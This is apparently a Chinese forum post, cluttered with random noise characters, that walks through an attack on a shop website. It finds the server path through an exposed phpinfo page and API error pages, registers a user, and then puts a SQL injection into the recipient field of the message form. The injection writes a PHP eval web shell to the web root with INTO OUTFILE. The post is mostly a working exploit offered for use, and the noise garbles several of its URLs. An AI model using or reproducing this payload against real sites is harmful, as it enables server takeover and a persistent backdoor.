第一个:想办法找到目标网站的绝对路径
1 O4 `! d/ C" M" K) F- h+ d
- p3 `, u N; rhttp://www.political-security.com/install/svinfo.php?phpinfo=true$ W2 j2 l7 J$ C" o% c s+ c! |3 j4 I
; r% Q7 N: x% }( Q& c
http:/www.political-security.com/core/api/shop_api.php
: X; N! a. p2 [& ^1 e- Z9 n+ ~6 ^! Q- u& E4 y \. Y& ?
http://www.political-security.co ... api_b2b_2_0_cat.php
3 E1 e6 Q! T( v% }8 |+ x
# }9 ]0 _/ D3 S2 R7 K8 r5 }) khttp://www.political-security.com/core/ap ... b_2_0_goodstype.php
5 h+ { s2 Y, @9 r
' Q% T! N/ `- lhttp://www.political-security.co ... i_b2b_2_0_brand.php4 J% O) m+ `% b/ i1 Z
第二个:注册一个普通用户) R4 B3 d6 f+ B2 u2 v8 f" [
' o! x+ H/ Y+ U5 ^
http://www.political-security.com/?passport-signup.html, s5 K( K: o1 G
- X: i2 X }( D* e1 K- m: Z5 K第三个: 发送消息 4 q0 A* W5 d, n, O
0 l% l+ @ z% }8 _$ m4 Nhttp://www.political-security.com/?member-send.html- G% G* m, m' s
发送给中填写
! O9 n1 f \# n# N% i T6 Iantian365.com' union select CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php' # |